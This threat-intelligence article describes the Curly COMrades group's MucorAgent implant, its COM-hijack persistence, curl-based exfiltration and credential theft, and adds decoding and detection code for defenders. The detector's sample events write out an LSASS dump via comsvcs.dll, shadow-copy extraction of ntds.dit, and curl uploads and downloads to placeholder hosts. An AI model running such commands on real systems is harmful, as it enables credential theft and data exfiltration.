
Unveiling the Curly COMrades: A New Era in Cyber-Espionage
Curly COMrades is a cyber-espionage group, assessed as Russia-aligned, that has been observed targeting government and other organizations in Georgia and Moldova (Tech Digest; Cyber Defense Advisors). Its custom implant, MucorAgent, is built for quiet, long-lived access rather than a noisy compromise. It is a three-stage .NET implant whose first stage is a hijacked Component Object Model (COM) handler: by registering its own DLL under a Class Identifier (CLSID) the system already uses, it gets loaded inside a legitimate host process whenever that CLSID is instantiated (BleepingComputer). That foothold is what the later stages build on: a bypass of the Antimalware Scan Interface (AMSI), followed by execution of an AES-encrypted PowerShell script that carries the actual tasking (Cyber Defense Advisors).
Persistence comes from a single mechanism rather than several. The hijacked CLSID belongs to a scheduled task of the .NET Native Image Generator (NGEN) that shows as disabled in Task Scheduler, yet the operating system still runs it at moments the attacker does not choose, such as idle periods or after new applications are installed (Tech Digest; BleepingComputer). The trigger is dependable; only its timing is unpredictable. For command-and-control and exfiltration the group leans on curl.exe, which ships with Windows, and on CurlCat, a custom libcurl-based relay, so that its traffic looks like ordinary web-client activity (Business Insights).
MucorAgent Malware: The Stealthy Intruder
Technical Architecture
MucorAgent is a three-stage .NET implant; each stage has a narrow job and hands off to the next. Stage one is the hijacked COM handler. The implant registers its own DLL as the in-process server for a CLSID the system already instantiates, so the loader runs inside a legitimate host process with no new executable, service or Run key to point at it; its only role is to load the second, .NET stage (BleepingComputer).
Stage two bypasses the Antimalware Scan Interface (AMSI). AMSI does not block anything by itself: it hands script content (PowerShell, VBScript, JScript and .NET assembly loads) to the installed antimalware engine for scanning, and defeating it denies the engine that view of the decrypted script. Stage three decrypts and runs an AES-encrypted PowerShell script that carries the operational logic, including data collection and further compromise (Cyber Defense Advisors). The caveat for defenders is that an AMSI bypass hides the script's text, not the process that ran it, the registry keys the implant lives in, or the network connections it makes, which is where detection has to look instead.
Persistence Mechanisms
MucorAgent's persistence is one mechanism, not two, and it is worth describing precisely because it defeats the usual review habits. The target is the scheduled task belonging to the .NET Framework's Native Image Generator (NGEN). That task does not launch an executable; its action is a COM handler identified by a CLSID, and the implant hijacks that CLSID so that its own DLL is the in-process server that gets loaded (Tech Digest; Cyber Defense Advisors).
The task appears disabled in Task Scheduler, which is the part that misleads. The operating system still runs it at times of its own choosing, for example when the machine is idle or when new applications are deployed, and each run instantiates the hijacked CLSID and with it the malware (BleepingComputer). The timing is therefore unpredictable, but the trigger itself is reliable. A review that filters out disabled tasks, or that reads a task's Actions without resolving the CLSID to the DLL registered as its in-process server (the InprocServer32 key), will not see it.
Data Exfiltration Techniques
Exfiltration and C2 transport lean on tooling that already looks legitimate. The first is curl.exe, which ships with Windows 10 and later and which the operators use heavily for command-and-control and for moving data in both directions (Business Insights). The point is not that curl.exe is disguised; it is a Microsoft-shipped binary, so its outbound HTTPS connections blend into ordinary traffic unless something looks at the command line (upload flags, archive paths) or at which user and parent process launched it.
The second is CurlCat, a custom tool built on libcurl that encodes traffic with a custom Base64 alphabet so that it does not decode with off-the-shelf tools, and relays it through compromised legitimate websites so that the destination looks benign (BleepingComputer). The custom alphabet is obfuscation, not encryption: it is a fixed substitution over the 64 symbols and is undone by a translation table once the alphabet is known. Alongside these, the group uses adapted open-source tools such as TrickDump, an LSASS memory dumper, delivered through custom shellcode loaders to stay below endpoint detection (BleepingComputer).
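The following is an added example, not code from CurlCat or from any cited report, showing what a custom Base64 alphabet does and does not buy an attacker: the blob still decodes with a standard decoder (every symbol is a legal Base64 character), but to noise, and a 64-symbol translation table restores the plaintext. The alphabet used here is an invented rotation of the standard one; the page does not disclose CurlCat's real alphabet. It also shows the known-plaintext recovery an analyst would use when a protocol with a fixed banner, such as SSH, is tunnelled this way.

```python
"""Custom-alphabet Base64 of the kind the text attributes to CurlCat, as an
added example. The data is ordinary Base64 over a permuted alphabet, so a
standard decoder returns noise while a translation table restores it.
The alphabet below is invented for the example; CurlCat's is not public."""
import base64
import string

STD = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
CUSTOM = STD[17:] + STD[:17]            # hypothetical permutation (a rotation)
TO_CUSTOM = str.maketrans(STD, CUSTOM)
TO_STD = str.maketrans(CUSTOM, STD)


def encode_custom(data: bytes) -> str:
    """Standard Base64, then symbol substitution; '=' padding is left alone."""
    return base64.b64encode(data).decode("ascii").translate(TO_CUSTOM)


def decode_custom(text: str) -> bytes:
    """Undo the substitution, then decode as ordinary Base64."""
    return base64.b64decode(text.translate(TO_STD), validate=True)


def naive_decode(text: str) -> bytes:
    """What an analyst gets by feeding the blob to a standard decoder: every
    symbol is still a legal Base64 character, so it decodes, but to garbage."""
    return base64.b64decode(text)


def recover_alphabet(known_plain: bytes, observed: str) -> dict:
    """Known-plaintext recovery of (custom symbol -> standard symbol) pairs.

    If `observed` is the obfuscated encoding of a stream that begins with
    `known_plain`, each complete 3-byte group of the plaintext fixes four
    symbols. Only whole groups are used: a trailing partial group encodes bits
    from unknown following bytes and would poison the table."""
    usable = len(known_plain) // 3 * 3
    expected = base64.b64encode(known_plain[:usable]).decode("ascii")
    mapping = {}
    for seen, std in zip(observed, expected):
        if mapping.setdefault(seen, std) != std:
            raise ValueError(f"symbol {seen!r} maps to two standard symbols; "
                             "wrong alignment or wrong plaintext")
    return mapping


if __name__ == "__main__":
    # Constructed stream: an SSH banner followed by arbitrary session bytes.
    stream = b"SSH-2.0-OpenSSH_9.6\r\n" + b"...rest of session..."
    blob = encode_custom(stream)
    print(blob)
    print(naive_decode(blob)[:16])        # not the SSH banner
    print(decode_custom(blob)[:21])       # the banner again
    table = recover_alphabet(b"SSH-2.0-OpenSSH_9.6\r\n", blob)
    print(f"{len(table)} of 64 symbols recovered from the banner alone")
```

Two practical notes. First, a blob that decodes cleanly as Base64 yet yields high-entropy bytes is ambiguous on its own, since genuinely encrypted content looks the same; the custom-alphabet hypothesis is confirmed only when a translation table produces structure. Second, the recovery function deliberately refuses an inconsistent mapping rather than overwriting it, because a contradiction almost always means the guessed plaintext is not at the offset the analyst assumed.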
Credential Harvesting
Credential theft is where the operators, using hands-on tooling rather than MucorAgent itself, turn a single foothold into domain-wide access. They use Mimikatz to pull credentials from memory, and they dump the Local Security Authority Subsystem Service (LSASS) process by calling the MiniDump export of the Windows-supplied comsvcs.dll through rundll32, which writes a memory image that can be parsed offline for the secrets of logged-on users (Business Insights). Because comsvcs.dll is a legitimate system library, the command line, not the binary, is what a detection has to key on.
On domain controllers they go after NTDS.dit, the Active Directory database that holds every domain account's password hashes. The file is locked while the directory service runs, so the attackers create a Volume Shadow Copy and copy the file out of the snapshot (the SYSTEM registry hive is also needed to decrypt its contents) (BleepingComputer). Nothing about this is silent: shadow-copy creation on a domain controller, whether via vssadmin, ntdsutil or diskshadow, is a well-known and high-value alert. Collected material, credentials and domain information among it, is first staged in publicly accessible locations on victim machines, then archived and sent to attacker-controlled servers (BleepingComputer).
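The following detection logic is an added example, not code from any of the cited reports, and covers both the transport section above (curl.exe transfers) and this section (comsvcs.dll LSASS dumps, shadow-copy NTDS.dit extraction, and archives staged in a web-served directory). It runs over constructed process-creation events shaped like Sysmon Event ID 1 or Security 4688 fields; the paths, the .invalid hostnames and the inetpub\wwwroot staging directory are assumptions made for the example.

```python
"""Detection logic for the living-off-the-land steps in the two sections
above, run over constructed process-creation events shaped like Sysmon Event
ID 1 / Security 4688 fields. Events, paths and hosts are constructed; the
web-served staging directory (inetpub\\wwwroot) is an assumption about what a
"publicly accessible location" looks like on an IIS host."""
import re

# curl flag regexes are case-sensitive on purpose: -T/-F/-d transfer data,
# while -t/-f/-D mean something else entirely.
CURL_UPLOAD = re.compile(r"\s(-T|--upload-file|-F|--form|-d|--data(-binary|-raw|-urlencode)?)\s")
CURL_DOWNLOAD = re.compile(r"\s(-[oO]|--output|--remote-name)(\s|$)")
COMSVCS_MINIDUMP = re.compile(r"comsvcs(\.dll)?\s*,?\s*(#24|minidump)", re.I)
SHADOW_COPY = re.compile(
    r"vssadmin(\.exe)?\s+create\s+shadow|ntdsutil.*\bifm\b|wmic.*shadowcopy\s+call\s+create"
    r"|diskshadow|harddiskvolumeshadowcopy\d+.*ntds\.dit", re.I)
WEBROOT = re.compile(r"inetpub\\wwwroot", re.I)        # assumed staging location
ARCHIVERS = {"7z.exe", "7za.exe", "rar.exe", "winrar.exe", "tar.exe", "makecab.exe"}


def image_name(event: dict) -> str:
    """Executable file name of the process, lower-cased."""
    return event["Image"].rsplit("\\", 1)[-1].lower()


# (rule id, description, predicate over one event)
RULES = [
    ("lsass_dump_comsvcs", "credential access: LSASS MiniDump via comsvcs.dll",
     lambda e: bool(COMSVCS_MINIDUMP.search(e["CommandLine"]))),
    ("shadow_copy_ntds", "credential access: shadow copy / NTDS.dit extraction",
     lambda e: bool(SHADOW_COPY.search(e["CommandLine"]))),
    ("archive_to_webroot", "collection: archive written into web-served directory",
     lambda e: image_name(e) in ARCHIVERS and bool(WEBROOT.search(e["CommandLine"]))),
    ("curl_upload", "exfiltration: curl.exe sending a file or request body",
     lambda e: image_name(e) == "curl.exe" and bool(CURL_UPLOAD.search(e["CommandLine"]))),
    ("curl_download", "tool retrieval: curl.exe writing a downloaded file",
     lambda e: image_name(e) == "curl.exe" and bool(CURL_DOWNLOAD.search(e["CommandLine"]))),
]


def match_event(event: dict) -> list:
    """Rule ids that fire for one event (possibly several)."""
    return [rule_id for rule_id, _, pred in RULES if pred(event)]


def scan(events: list) -> list:
    """One hit per (event, rule) pair, carrying enough context to triage."""
    descriptions = {rule_id: desc for rule_id, desc, _ in RULES}
    hits = []
    for event in events:
        for rule_id in match_event(event):
            hits.append({"rule": rule_id, "description": descriptions[rule_id],
                         "Image": event["Image"], "CommandLine": event["CommandLine"]})
    return hits


# Constructed sample telemetry; only Image and CommandLine are used here.
EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Windows\Temp\l.dmp full"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": r"vssadmin.exe create shadow /for=C:"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit C:\inetpub\wwwroot\tmp\ntds.dit"},
    {"Image": r"C:\Tools\7z.exe",
     "CommandLine": r"7z.exe a -pexample C:\inetpub\wwwroot\tmp\d.7z C:\inetpub\wwwroot\tmp\*"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s -T C:\inetpub\wwwroot\tmp\d.7z https://cdn.example.invalid/up"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s -o C:\ProgramData\svc.exe https://cdn.example.invalid/r"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s https://updates.example.invalid/status"},   # benign: no transfer flags
    {"Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(f"[{hit['rule']}] {hit['description']}\n    {hit['CommandLine']}")
```

Matching the archiver and curl rules on the executable name rather than on free text is what keeps a file called data.7z inside a curl command from tripping the archiver rule, and the curl flag patterns are case-sensitive because -d and -D, or -f and -F, are different options. In production these rules would be fed from Sysmon or EDR telemetry with ParentImage and User added to each event, so that a curl.exe launched by a web-server worker process or a service account can be weighted above the same command typed by an administrator.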
Network Communication and Obfuscation
For interactive access the operators deploy Resocks, a Go-based reverse SOCKS proxy, which they fetch with curl.exe and register as a scheduled task or a Windows service so that it survives reboots. It connects out to the C2 server on TCP port 443 or 8443 (BleepingComputer). The port choice is about blending in with HTTPS, not about security: an analyst should not read "port 443" as "encrypted", and should instead ask whether the destination and the process that opened the connection make sense for that host.
For redundancy they also run custom SOCKS5 servers and use SSH combined with Stunnel for remote port forwarding, with some SSH sessions tunnelled through CurlCat so that the traffic passes through a compromised legitimate website first (Business Insights). The result is several independent paths back to the operators, so blocking one address or protocol does not end the intrusion; the channels have to be found and removed together.
Final Thoughts
MucorAgent is a reminder that the most durable intrusions are built from pieces the system already trusts: a COM handler loaded by a scheduled task the OS runs on its own, a Windows-supplied HTTP client for transport, a system library for dumping LSASS, and shadow copies for NTDS.dit. None of those binaries is malicious, so the defences that matter are the ones that look at context rather than files: resolving scheduled-task COM handlers to the DLLs they actually load and alerting on changes, keeping disabled tasks in scope, watching curl.exe command lines and parent processes, alerting on comsvcs.dll MiniDump invocations and on shadow-copy creation on domain controllers, and hunting for archives in web-served directories (BleepingComputer; Business Insights). Taken together, from initial foothold through persistence to exfiltration, the operation shows how much of current espionage tradecraft is living off the land, and that the response has to be built around behaviour rather than signatures.
References
- BleepingComputer. (2025). Curly COMrades cyberspies hit govt orgs with custom malware. https://www.bleepingcomputer.com/news/security/curly-comrades-cyberspies-hit-govt-orgs-with-custom-malware/
- Cyber Defense Advisors. (2025). New Curly COMrades APT using NGEN COM hijacking in Georgia, Moldova attacks. https://cyberdefenseadvisors.com/new-curly-comrades-apt-using-ngen-com-hijacking-in-georgia-moldova-attacks/
- Tech Digest. (2025). New Russian-aligned hacking group targeting Eastern Europe infrastructure. https://www.techdigest.tv/2025/08/new-russian-aligned-hacking-group-targeting-eastern-europe-infrastructure.html
- Business Insights. (2025). Curly COMrades: New threat actor targeting geopolitical hotbeds. https://businessinsights.bitdefender.com/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds